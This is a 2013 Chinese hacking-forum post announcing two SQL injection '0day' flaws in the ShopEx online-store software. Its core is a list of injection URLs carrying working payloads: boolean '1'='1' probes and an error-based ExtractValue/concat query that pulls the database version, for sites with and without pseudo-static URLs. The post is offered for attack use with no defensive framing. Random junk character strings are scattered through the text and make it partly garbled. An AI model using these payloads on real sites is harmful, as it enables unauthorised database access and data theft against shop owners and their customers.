中国网络渗透测试联盟

标题: shopex通杀注入0day漏洞两处 [打印本页]
作者: admin    时间: 2013-2-19 08:31
标题: shopex通杀注入0day漏洞两处
注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
3 M* d9 A/ n$ s* h! \; Z* h: t+ o' \) r, f* q1 \
好吧,我扯远了~~4 D% C& }9 v, z( z
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
2 R) T  N0 A- f6 o3 B: L" p不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
7 m; x" h% `9 G# V
# I, V6 ?6 t& Phttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html + c1 U1 q# |: I1 n  l- v/ X
1 E! s( ]  j/ o( D& z$ z) J- C
http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html 8 x4 X" {) b( I" H+ f- {7 n
! P  d* H: Y* N
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
4 }$ _! ~) s9 U* u1 b# K) ?% C$ E) [
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
" y" X) e& O+ z) s8 y0 x4 W3 Y1 C

' i/ a4 m6 i! m5 w& {) G( M一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
+ ]5 q3 k3 ?8 N! \( w如何注入就不多说了,10多年的东西了…不会也会了… & K& @% D! v- M

- |1 L) p* `* v
. c8 J( F9 ]0 @6 l' w# ~  a
& a3 @* x2 K- D9 M
; y& [, X8 B: O5 F) ~. S! F



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2